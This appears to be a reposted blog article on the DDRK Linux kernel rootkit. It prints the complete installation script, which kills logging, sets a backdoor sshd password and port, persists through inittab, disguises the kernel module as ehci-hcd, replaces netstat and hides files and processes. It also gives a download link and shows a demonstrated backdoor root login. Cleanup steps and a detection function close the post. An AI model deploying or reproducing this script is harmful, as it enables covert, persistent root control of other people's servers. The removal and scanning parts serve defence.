Rootkit DDRK on Linux: how the attack obtains root and how to remove it
Source: Internet  Published by: 宜宾网络电视台  Editor: 程序博客网  Time: 2024/05/23 01:57
DDRK is a kernel-level Linux rootkit that combines the strengths of shv and adore-ng.
Files included in DDRK:
netstat  # replaces the system netstat; reads the backdoor port from the sshd configuration file and hides it
rk.ko    # kernel module that implements file and process hiding
setup    # rootkit installation script
tty      # the ava tool (adore-ng's user-space control program)
bin.tgz
---ttymon
---sshd.tgz
---.sh
---shdcf2  # sshd configuration file
---shhk
---shhk.pub
---shrs
---sshd  # main sshd binary (the backdoor server)
DDRK download: http://pan.baidu.com/s/1qWkchlU
So once these files are uploaded to a server and run successfully, the attacker holds root on that server and can do anything with it.
The contents of setup are as follows:
#!/bin/bash
##########define variables##########
DEFPASS=123456          # default password
DEFPORT=43958           # default port
BASEDIR=`pwd`
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
##########check is root##########
if [ "$(whoami)" != "root" ]; then
 echo "BECOME ROOT AND TRY AGAIN"
 echo ""
 exit
fi
##########extract all tar##########
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR
##########kill syslogd##########
killall -9 syslogd >/dev/null 2>&1
sleep 2
##########remove sh.conf##########
if [ -f /etc/sh.conf ]; then
 rm -rf /etc/sh.conf   # password file (an md5sum hash of the password)
fi
##########initialize sshd configuration##########
if test -n "$1" ; then
 echo "Using Password : $1"
 cd $BASEDIR/bin
 echo -n $1|md5sum > /etc/sh.conf
else
 echo "No Password Specified, using default - $DEFPASS"
 echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
if test -n "$2" ; then
 echo "Using ssh-port : $2"
 echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
 cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
 mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
 echo "No ssh-port Specified, using default - $DEFPORT"
 echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
 cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
 mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
###########creating dirs##########
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
 rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
 rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
if [ -f /sbin/ttyload ]; then
 chattr -AacdisSu /sbin/ttyload
 rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
 rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
 rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR
#########modify inittab##########
cp /etc/inittab /etc/.inittab
# insert a ttyload entry on its own line ahead of the first mingetty entry
sed -e 's@^1:2345@0:2345:once:/usr/sbin/ttyload\n&@' /etc/inittab > /etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab
echo "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i `pidof ttyload` > /dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i `pidof ttymon` > /dev/null 2>&1" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
/usr/sbin/ttyload > /dev/null 2>&1
touch -amcr /bin/ls /etc/inittab
##########make sure inittab has modified##########
if [ ! "`grep ttyload /etc/inittab`" ]; then
 echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART "
 echo "# inittab shuffling probly fucked-up ! "
fi
##########load rk.ko##########
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR
##########replace netstat##########
touch -acmr /bin/netstat netstat
mv -f netstat /bin/netstat
##########hide all files and process##########
$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1
$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1
$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1
##########load rk.ko on boot##########
cat > /etc/sysconfig/modules/ehci.modules << EOF
#!/bin/sh
#install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules
chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1
##########check iptables setting##########
if [ -f /sbin/iptables ]; then
 echo "`/sbin/iptables -L INPUT | head -5`"
else
 echo ""
 echo "# lucky for u no iptables found"
fi
##########start syslogd##########
/sbin/syslogd -m 0
# ./setup 123 3333    # sets the password to 123 and the port to 3333
Using Password : 123
Using ssh-port : 3333
Chain INPUT (policy ACCEPT)
target prot opt source destination
Checking the hiding effect:
Checking processes
# ps -ef | egrep -i "ttyload|ttymon"
root 24761 17990 0 13:29 pts/2 00:00:00 egrep -i ttyload|ttymon
Checking ports
# netstat -ntplu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2117/hpiod
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2267/mysqld
tcp 0 0 0.0.0.0:43958 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2134/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2295/sendmail: acce
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2122/python
udp 0 0 0.0.0.0:32768 0.0.0.0:* 2417/avahi-daemon:
udp 0 0 0.0.0.0:68 0.0.0.0:* 19752/dhclient
udp 0 0 0.0.0.0:5353 0.0.0.0:* 2417/avahi-daemon:
udp 0 0 0.0.0.0:631 0.0.0.0:* 2134/cupsd
Checking loaded modules
# lsmod | grep -i ehci-hcd
Checking the rootkit-related files
# ls -dl /lib/libsh.so /usr/lib/libsh /etc/sh.conf /sbin/ttyload /sbin/ttymon /bin/ttymon /usr/sbin/ttyload
ls: /bin/ttymon: No such file or directory
-rw-r--r-- 1 2618748389 4063569279 36 Nov 28 2006 /etc/sh.conf
drwxr-xr-x 2 2618748389 4063569279 4096 May 11 13:28 /lib/libsh.so
-rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28 2006 /sbin/ttyload
-rwxrwxr-x 1 2618748389 4063569279 93476 Nov 28 2006 /sbin/ttymon
drwxr-xr-x 2 2618748389 4063569279 4096 May 11 13:28 /usr/lib/libsh
-rwxr-xr-x 1 2618748389 4063569279 171 Nov 28 2006 /usr/sbin/ttyload
Checking /etc/inittab
# Run gettys in standard runlevels
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
Verification:
The compromised host on which the rootkit was installed and run successfully is 192.168.27.129.
Log in to 192.168.27.129 from another host, with password 123 and port 3333:
[root@localhost ~]# ssh 192.168.27.129 -p 3333
root@192.168.27.129's password:
Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1
[sh] w.e.l.c.o.m.e
[sh] To The DoDos Rootkit
[root@DoDo:/root]#
[root@DoDo:/root]# env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=192.168.27.130 38824 3333
SSH_TTY=/dev/pts/3
USER=root
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
MAIL=/var/spool/mail/root
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.
PWD=/root
MACHINE=DoDo
PS1=[33[0;36m][$ID@[33[1;37m]$MACHINE[33[0m][33[0;36m]:${PWD}]#[33[0m]
SHLVL=1
HOME=/usr/lib/libsh
ID=root
LOGNAME=root
_=/bin/env
At this point 192.168.27.129 is fully under the attacker's control.
Check the logged-in users on 192.168.27.129:
# w
13:40:55 up 3:40, 0 users, load average: 1.23, 0.93, 0.77
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Only local users are listed; the backdoor session does not appear.
Cleanup procedure:
# cd /usr/lib/libsh
# modprobe -r ehci-hcd
# ./tty u /etc/sysconfig/modules/ehci.modules
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sysconfig/modules/ehci.modules
# rm -rf /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
# ./tty u /etc/sh.conf
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /lib/libsh.so
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttyload
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /usr/sbin/ttyload
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttymon
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon
# rm -rf /bin/netstat
# vim /etc/inittab    # remove the line 0:2345:once:/usr/sbin/ttyload
Beyond this, you should still find out where the system was vulnerable in the first place, so the problem does not recur.
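As an added defender-side example (not code from the original post or from DDRK), the following POSIX sh function checks a filesystem root for the artifacts the post lists in the hiding checks and the cleanup above: the hidden paths, the inittab persistence entry, and the ehci.modules boot hook. It assumes the mount point is passed as its first argument; run it against an offline-mounted image, or on the live host only after `modprobe -r ehci-hcd` as the cleanup does, because the loaded rk.ko hides these paths from ls and the ttyload/ttymon processes from ps.

```shell
# ddrk_scan ROOT: look for the DDRK artifacts described in the post under the
# filesystem rooted at ROOT (default /). Prints each hit and returns the number
# of hits, so a return value of 0 means nothing was found.
ddrk_scan() {
    root="${1:-/}"
    hits=0
    # Files and directories that setup creates and then hides with `tty h`.
    for p in /etc/sh.conf /lib/libsh.so /usr/lib/libsh \
             /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon; do
        if [ -e "$root$p" ]; then
            echo "FOUND: $p"
            hits=$((hits + 1))
        fi
    done
    # Persistence: the line setup inserts ahead of the first mingetty entry.
    if [ -f "$root/etc/inittab" ] &&
       grep -q '^0:2345:once:/usr/sbin/ttyload' "$root/etc/inittab"; then
        echo "FOUND: ttyload entry in /etc/inittab"
        hits=$((hits + 1))
    fi
    # Boot hook: a *.modules script that force-reloads ehci-hcd, the name
    # under which rk.ko was placed in the kernel module tree.
    m="$root/etc/sysconfig/modules/ehci.modules"
    if [ -f "$m" ] && grep -q 'modprobe -r ehci-hcd' "$m"; then
        echo "FOUND: ehci-hcd reload hook in $m"
        hits=$((hits + 1))
    fi
    echo "DDRK indicators found: $hits"
    return "$hits"
}
```

The replaced /bin/netstat has no fixed path signature, so verify that binary against your package manager's file checksums separately.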